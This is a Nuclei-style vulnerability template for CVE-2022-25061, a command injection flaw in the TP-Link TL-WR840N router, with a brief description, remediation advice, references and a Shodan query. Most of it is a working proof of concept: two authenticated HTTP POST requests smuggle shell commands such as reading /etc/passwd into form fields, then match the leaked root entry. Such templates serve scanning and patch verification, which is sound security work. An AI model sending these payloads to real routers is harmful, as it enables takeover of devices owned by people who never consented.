The TP-Link TL-WR840N(ES)_V6.20_180709 router contains a command injection vulnerability in the oal_setIp6DefaultRoute component. This vulnerability allows authenticated attackers to execute arbitrary system commands, leading to complete device compromise.
PoC代码[已公开]
id: CVE-2022-25061
info:
name: TP-Link TL-WR840N - Command Injection
author: ritikchaddha
severity: critical
description: |
The TP-Link TL-WR840N(ES)_V6.20_180709 router contains a command injection vulnerability in the oal_setIp6DefaultRoute component. This vulnerability allows authenticated attackers to execute arbitrary system commands, leading to complete device compromise.
remediation: |
Update firmware to the latest version if available. If no firmware update is available,consider implementing network segmentation to limit access to the router's management interface.
reference:
- https://github.com/exploitwritter/CVE-2022-25061/blob/main/CVE-2022-25061.py
- https://east-trowel-102.notion.site/CVE-2021-XXXX-Injection-of-commands-through-object-oal_setIp6DefaultRoute-EN-ddf9c1db199d49829269147ada6cb312
- https://nvd.nist.gov/vuln/detail/CVE-2022-25061
- http://router.com
- http://tp-link.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25061
cwe-id: CWE-78
epss-score: 0.76113
epss-percentile: 0.98883
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:6.20_180709:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: tp-link
product: tl-wr840n_firmware
shodan-query: 'title:"TL-WR840N"'
tags: cve,cve2022,tplink,router,rce,iot,authenticated
variables:
filename: "{{to_lower(rand_text_alpha(3))}}"
http:
- raw:
- |
POST /cgi?2 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Authorization: Basic {{base64(username + ':' + password)}}
Referer: {{RootURL}}/mainFrame.htm
[NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5
enable=1
userName=;cat /etc/passwd > /tmp/{{filename}}.txt;
password=;cat /proc/cpuinfo >> /tmp/{{filename}}.txt;
userDomain=;cat /tmp/{{filename}}.txt;
login=1
- |
POST /cgi?2 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Authorization: Basic {{base64(username + ':' + password)}}
Referer: {{RootURL}}/mainFrame.htm
[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3
__ifAliasName=ewan_ipoev6_d
__ifName=;cat /tmp/{{filename}}.txt;
defaultConnectionService=
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 490a0046304402200328a63174bddc584f8b9e135ede2127991486c8fa87fb34be61132e1c6db9ac02200d80f18c2bc83955628869175cf243727169e8e799a302218445ed924fb9580f:922c64590222798bb761d5b6d8e72950